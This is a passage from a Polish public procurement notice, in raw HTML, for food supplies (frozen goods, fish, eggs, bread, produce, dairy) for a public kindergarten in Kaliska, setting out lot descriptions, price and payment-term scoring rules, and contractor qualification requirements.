wzoru:<br/> Zasady oceny ofert w poszczególnych kryteriach: <br/>1)	Cena (C) – waga 60% <br/> cena najniższa brutto*<br/>C = --------------------------------------------------- x 100 x 60 % c<br/> cena oferty ocenianej brutto<br/><br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a.	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu ofertowym. <br/>b.	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia<br/><br/> 2) Termin płatności faktury – waga 40 %<br/> Termin płatności badanej oferty*<br/> T = ----------------------------------------------------------- x 100 x40 % <br/> Oferta z najdłuższym terminem płatności<br/><br/> *spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a)	Wskazany termin płatności nie może być krótszy niż 14 dni i nie dłuższy niż 30 dni.<br/>3.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma najwyższą liczbę punktów zgodnie z w/w wzorem: <br/>4.	Obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup o charakterze sukcesywnym artykułów spożywczych do Samorządowego Przedszkola Publicznego w Kaliskach, znajdującego się przy ul. Nowowiejskej 3, 83-260 Kaliska<br/>Przedmiot zamówienia dotyczy części -4.	Zadanie 4 Produkty mrożone<br/>Szczegółowe ilości opisane zostały w załączniku nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15896000-5 - Produkty głęboko mrożone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/> 1) Cena (C) – waga kryterium 60 % <br/> 2) Termin płatności faktury – waga kryterium 40 %<br/> Oddzielnie dla każdej części zamówienia.<br/>2.	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/> Zasady oceny ofert w poszczególnych kryteriach: <br/>1)	Cena (C) – waga 60% <br/> cena najniższa brutto*<br/>C = --------------------------------------------------- x 100 x 60 % c<br/> cena oferty ocenianej brutto<br/><br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a.	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu ofertowym. <br/>b.	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia<br/><br/> 2) Termin płatności faktury – waga 40 %<br/> Termin płatności badanej oferty*<br/> T = ----------------------------------------------------------- x 100 x40 % <br/> Oferta z najdłuższym terminem płatności<br/><br/> *spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a)	Wskazany termin płatności nie może być krótszy niż 14 dni i nie dłuższy niż 30 dni.<br/>3.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma najwyższą liczbę punktów zgodnie z w/w wzorem: <br/>4.	Obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup o charakterze sukcesywnym artykułów spożywczych do Samorządowego Przedszkola Publicznego w Kaliskach, znajdującego się przy ul. Nowowiejskej 3, 83-260 Kaliska<br/>Przedmiot zamówienia dotyczy części -5.	Zadanie5 Ryby, ryby mrożone<br/><br/>Szczegółowe ilości opisane zostały w załączniku nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/> 1) Cena (C) – waga kryterium 60 % <br/> 2) Termin płatności faktury – waga kryterium 40 %<br/> Oddzielnie dla każdej części zamówienia.<br/>2.	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/> Zasady oceny ofert w poszczególnych kryteriach: <br/>1)	Cena (C) – waga 60% <br/> cena najniższa brutto*<br/>C = --------------------------------------------------- x 100 x 60 % c<br/> cena oferty ocenianej brutto<br/><br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a.	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu ofertowym. <br/>b.	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia<br/><br/> 2) Termin płatności faktury – waga 40 %<br/> Termin płatności badanej oferty*<br/> T = ----------------------------------------------------------- x 100 x40 % <br/> Oferta z najdłuższym terminem płatności<br/><br/> *spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a)	Wskazany termin płatności nie może być krótszy niż 14 dni i nie dłuższy niż 30 dni.<br/>3.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma najwyższą liczbę punktów zgodnie z w/w wzorem: <br/>4.	Obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup o charakterze sukcesywnym artykułów spożywczych do Samorządowego Przedszkola Publicznego w Kaliskach, znajdującego się przy ul. Nowowiejskej 3, 83-260 Kaliska<br/>Przedmiot zamówienia dotyczy części -6.	Zadanie 6 Jaja<br/><br/>Szczegółowe ilości opisane zostały w załączniku nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03142500-3 - Jaja</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/> 1) Cena (C) – waga kryterium 60 % <br/> 2) Termin płatności faktury – waga kryterium 40 %<br/> Oddzielnie dla każdej części zamówienia.<br/>2.	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/> Zasady oceny ofert w poszczególnych kryteriach: <br/>1)	Cena (C) – waga 60% <br/> cena najniższa brutto*<br/>C = --------------------------------------------------- x 100 x 60 % c<br/> cena oferty ocenianej brutto<br/><br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a.	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu ofertowym. <br/>b.	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia<br/><br/> 2) Termin płatności faktury – waga 40 %<br/> Termin płatności badanej oferty*<br/> T = ----------------------------------------------------------- x 100 x40 % <br/> Oferta z najdłuższym terminem płatności<br/><br/> *spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a)	Wskazany termin płatności nie może być krótszy niż 14 dni i nie dłuższy niż 30 dni.<br/>3.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma najwyższą liczbę punktów zgodnie z w/w wzorem: <br/>4.	Obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup o charakterze sukcesywnym artykułów spożywczych do Samorządowego Przedszkola Publicznego w Kaliskach, znajdującego się przy ul. Nowowiejskej 3, 83-260 Kaliska<br/>Przedmiot zamówienia dotyczy części -7.	Zadanie 7 Pieczywo, wyroby cukiernicze<br/><br/>Szczegółowe ilości opisane zostały w załączniku nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/> 1) Cena (C) – waga kryterium 60 % <br/> 2) Termin płatności faktury – waga kryterium 40 %<br/> Oddzielnie dla każdej części zamówienia.<br/>2.	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/> Zasady oceny ofert w poszczególnych kryteriach: <br/>1)	Cena (C) – waga 60% <br/> cena najniższa brutto*<br/>C = --------------------------------------------------- x 100 x 60 % c<br/> cena oferty ocenianej brutto<br/><br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a.	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu ofertowym. <br/>b.	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia<br/><br/> 2) Termin płatności faktury – waga 40 %<br/> Termin płatności badanej oferty*<br/> T = ----------------------------------------------------------- x 100 x40 % <br/> Oferta z najdłuższym terminem płatności<br/><br/> *spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a)	Wskazany termin płatności nie może być krótszy niż 14 dni i nie dłuższy niż 30 dni.<br/>3.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma najwyższą liczbę punktów zgodnie z w/w wzorem: <br/>4.	Obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup o charakterze sukcesywnym artykułów spożywczych do Samorządowego Przedszkola Publicznego w Kaliskach, znajdującego się przy ul. Nowowiejskej 3, 83-260 Kaliska<br/>Przedmiot zamówienia dotyczy części -8.	Zadanie 8 Warzywa i owoce<br/><br/>Szczegółowe ilości opisane zostały w załączniku nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/> 1) Cena (C) – waga kryterium 60 % <br/> 2) Termin płatności faktury – waga kryterium 40 %<br/> Oddzielnie dla każdej części zamówienia.<br/>2.	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/> Zasady oceny ofert w poszczególnych kryteriach: <br/>1)	Cena (C) – waga 60% <br/> cena najniższa brutto*<br/>C = --------------------------------------------------- x 100 x 60 % c<br/> cena oferty ocenianej brutto<br/><br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a.	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu ofertowym. <br/>b.	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia<br/><br/> 2) Termin płatności faktury – waga 40 %<br/> Termin płatności badanej oferty*<br/> T = ----------------------------------------------------------- x 100 x40 % <br/> Oferta z najdłuższym terminem płatności<br/><br/> *spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a)	Wskazany termin płatności nie może być krótszy niż 14 dni i nie dłuższy niż 30 dni.<br/>3.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma najwyższą liczbę punktów zgodnie z w/w wzorem: <br/>4.	Obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup o charakterze sukcesywnym artykułów spożywczych do Samorządowego Przedszkola Publicznego w Kaliskach, znajdującego się przy ul. Nowowiejskej 3, 83-260 Kaliska<br/>Przedmiot zamówienia dotyczy części -9.	Zadanie 9 Produkty mleczne, nabiał<br/>Szczegółowe ilości opisane zostały w załączniku nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/> 1) Cena (C) – waga kryterium 60 % <br/> 2) Termin płatności faktury – waga kryterium 40 %<br/> Oddzielnie dla każdej części zamówienia.<br/>2.	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/> Zasady oceny ofert w poszczególnych kryteriach: <br/>1)	Cena (C) – waga 60% <br/> cena najniższa brutto*<br/>C = --------------------------------------------------- x 100 x 60 % c<br/> cena oferty ocenianej brutto<br/><br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a.	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu ofertowym. <br/>b.	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia<br/><br/> 2) Termin płatności faktury – waga 40 %<br/> Termin płatności badanej oferty*<br/> T = ----------------------------------------------------------- x 100 x40 % <br/> Oferta z najdłuższym terminem płatności<br/><br/> *spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a)	Wskazany termin płatności nie może być krótszy niż 14 dni i nie dłuższy niż 30 dni.<br/>3.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma najwyższą liczbę punktów zgodnie z w/w wzorem: <br/>4.	Obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> . O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/> 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>1) zdolności do występowania w obrocie gospodarczym – Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów, tj. prowadzi działalność gospodarczą bezpośrednio związaną z przedmiotem zamówienia, jest wpisany do Centralnej Ewidencji o Działalności Gospodarczej; <br/>3) sytuacji ekonomicznej lub finansowej – Zamawiający nie wyznacza szczegółowego warunku w tym zakresie; <br/> 4) zdolności technicznej lub zawodowej tj: <br/>a)	nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał osobiście co najmniej dwie dostawy odpowiadające rodzajem przedmiotowi zamówienia o wartości łącznej co najmniej 30.000,00 zł brutto..<br/>3.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy w odniesieniu do warunków, które zostały opisane w rozdziale VI ust. 2 SWZ - zgodnie z treścią Formularza ofertowego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">: 1.Do oferty Wyk.zobowiązany jest dołączyć aktualne na dzień składania<br/>ofert ośw.o spełnianiu war.udziału w postępowaniu oraz o braku podstaw do wykluczenia z<br/>postępowania–zgodnie z Zał.nr 3doSWZ.<br/>2.Inf.zawarte w ośw.,o którym mowa wyżej stanowią wstępne potwierdzenie,że Wykonawca nie<br/>podlega wykluczeniu oraz spełnia warunki udziału w post.<br/>3.Zam.wzywa Wyk.,którego oferta została najwyżej oceniona,do złożenia w wyznaczonym terminie,nie<br/>krótszym niż5 dni od dnia wezw,podmiot.śr.dow.–tj.aktualnych na dzień złożenia następujących<br/>ośw.lub dok.:<br/>1)ośw.Wyk.w zakresie art.108 ust.1 pkt 5 PZP o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów(Dz.U.z2021r.,poz.275z późn.zm.)z innym Wyk.,który złożył odrębną ofertę,ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postęp.,albo ośw.o przynależ.do tej samej grupy<br/>kapit.wraz z dok.lub inf.potwierdzającymi przygotowanie ofert,oferty częśc.lub wniosku o dop.do<br/>udziału w postęp.niezależnie od innego Wyk.należącego do tej samej grupy kapit.–Zał.nr4 doSWZ,<br/>2)odpis lub inf.z KRS lub z CEIDG,w zakresie art.109ust.1 pkt4PZP,sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem,jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>3)wykaz usług wykonanych nie wcześniej niż w okresie ostatnich5lat,a jeżeli okres prowadzenia<br/>działalności jest krótszy–w tym okresie,porównywalnych z usługami stanowiącymi przedmiot<br/>zamówienia, wraz z podaniem ich rodzaju, wartości,daty,miejsca wykonania i podmiotów,na rzecz<br/>których usługi te zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały<br/>wykonane należycie, przy czym dowodami, o których mowa,są ref.bądź inne dok.sporządzone przez<br/>podmiot,na rzecz którego usługi były wykonywane,a jeżeli z uzasadnionej przyczyny o obiektywnym<br/>charakterze Wyk.onawca nie jest w stanie uzyskać tych dokumentów–inne odpowiednie dok.–<br/>Zał.nr6doSWZ.4.W przypadku,gdy Wyk.w celu potwierdzenia speł.war.udziału w post.,powołuje się na<br/>podmiot,o którym mowa w art118ust.1ustawy,musi wykazać, że wobec tego podmiotu nie zachodzą<br/>przesłanki wykluczenia, o których mowa w rozdziale VII niniejszej SWZ.5.Jeżeli Wykonawca ma<br/>siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,zamiast dokumentu, o<br/>którym mowa w ust.3pkt2powyżej,składa dokument lub dokumenty wystawione w kraju,w którym<br/>Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio,że nie otwarto jego<br/>likwidacji ani nie ogłoszono upadłości.Dokument,o którym mowa powyżej,powinien być wystawiony nie<br/>wcześniej niż3miesiące przed upływem terminu składania ofert.<br/>6.Jeżeli w kraju,w którym Wyk.ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o<br/>których mowa w ust. 3 pkt 2, zastępuje się je w całości lub części 